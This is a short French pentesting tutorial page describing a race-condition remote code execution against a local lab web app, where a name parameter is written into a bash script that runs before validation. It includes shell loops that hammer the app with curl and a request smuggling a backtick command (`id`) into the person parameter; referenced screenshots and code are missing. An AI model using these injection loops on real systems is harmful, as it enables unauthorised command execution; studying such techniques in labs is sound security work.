Race Condition RCE - Pentesting Web

Voici l'interface où nous entrons notre nom :

Ce nom apparaît dans l'URL en GET avec le format suivant :

Voici le code que nous allons essayer de compromettre. Il crée un fichier temporaire hello.sh avec le nom saisi :

Cela signifie que comme Bash est en cours d'exécution, nous pouvons exécuter des commandes, mais dans ce cas, une erreur se produit :

L'erreur se produit car il y a une petite validation de caractères autorisés. MAIS d'abord, la commande est exécutée, puis la validation a lieu :

Nous allons profiter du fait qu'il y a quelques millisecondes avant que le script ne soit exécuté avant d'être validé en envoyant de nombreuses requêtes et en parvenant à voir le contenu :

while true; do cat hello.txt | grep -v "test"; done

Dans un cas réel où nous n'aurions pas accès au fichier "hello.txt", nous utiliserions curl de la manière suivante

Nous nous mettons en écoute des requêtes en filtrant par le champ qui nous intéresse :

while true; do curl -s -X GET 'http://localhost:5000/?action=run' | grep "Check this out" | html2text | xargs; done

Nous lançons une attaque de force brute jusqu'à ce que la condition soit établie

while true; do curl -s -X GET 'http://localhost:5000/?person=`id`&action=validate'; done

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?